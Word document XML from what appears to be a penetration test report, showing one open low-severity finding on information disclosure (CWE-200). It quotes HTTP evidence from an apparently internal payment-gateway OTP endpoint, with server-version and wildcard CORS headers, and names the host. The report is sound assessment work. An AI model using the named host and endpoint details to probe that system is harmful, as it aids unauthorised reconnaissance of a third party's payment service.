          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="228B22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7992EFCF" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="18" w:name="_Toc10703678"/>
            <w:r>
              <w:t>L5</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Sensitive Information Disclosure</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="644C11DC" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="441E685A"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D962666" w14:textId="1AEA4258" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId39" w:anchor="CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="004853F5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>2.6</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="13C4B14B" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="555619F5"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="632EC191" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-200: Information Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="599AE2B8" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD24702"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CFB23D8" w14:textId="6A26F534" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="004853F5" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="6931FE13" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="25F8911A"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4BE34745" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00D4024A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information</w:t>
            </w:r>
            <w:r w:rsidR="00D4024A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="50D17D03" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DED2134"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D1F9CDC" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00D4024A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase (Architecture and Design) - Strategy (Separation of Privilege) - Compartmentalize the system to have </w:t>
            </w:r>
            <w:r w:rsidR="00D4024A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>safe</w:t>
            </w:r>
            <w:r w:rsidR="00D4024A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> areas where trust boundaries can be unambiguously drawn. Do </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>not allow sensitive data to go outside of the trust boundary and always be car</w:t>
            </w:r>
            <w:r w:rsidR="00D4024A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">eful not to expose system information. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3F42E662" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0FB5B4CF"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lastRenderedPageBreak/>
              <w:t>Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="48E61F13" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0C90492F" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="048D0636" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00D4024A" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The below snippet identifies the username being sent through the header and the X-Powered-By header being set in the response.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3133F978" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4024A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D4024A" w:rsidRPr="00D4024A" w14:paraId="4AECF268" w14:textId="77777777" w:rsidTr="004853F5">
              <w:trPr>
                <w:trHeight w:val="1205"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="31F63EBF" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>otp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/validate</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4ED1EA2C" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="66116A15" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="21B833C6" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>senderapp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: TPP</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="32A6FAB6" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7F1C54E5" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4024A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D4024A" w:rsidRPr="00D4024A" w14:paraId="0023F85B" w14:textId="77777777" w:rsidTr="00D4024A">
              <w:trPr>
                <w:trHeight w:val="1232"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="7CF1E294" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="668E3EAD" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Wed, 29 May 2019 19:34:27 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7A0756E0" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>X-Powered-By: Servlet/3.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="069CBC06" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Access-Control-Allow-Origin: *</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="45E5F457" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="21DB965B" w14:textId="77777777" w:rsidR="00D4024A" w:rsidRPr="00D4024A" w:rsidRDefault="00D4024A" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4024A">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
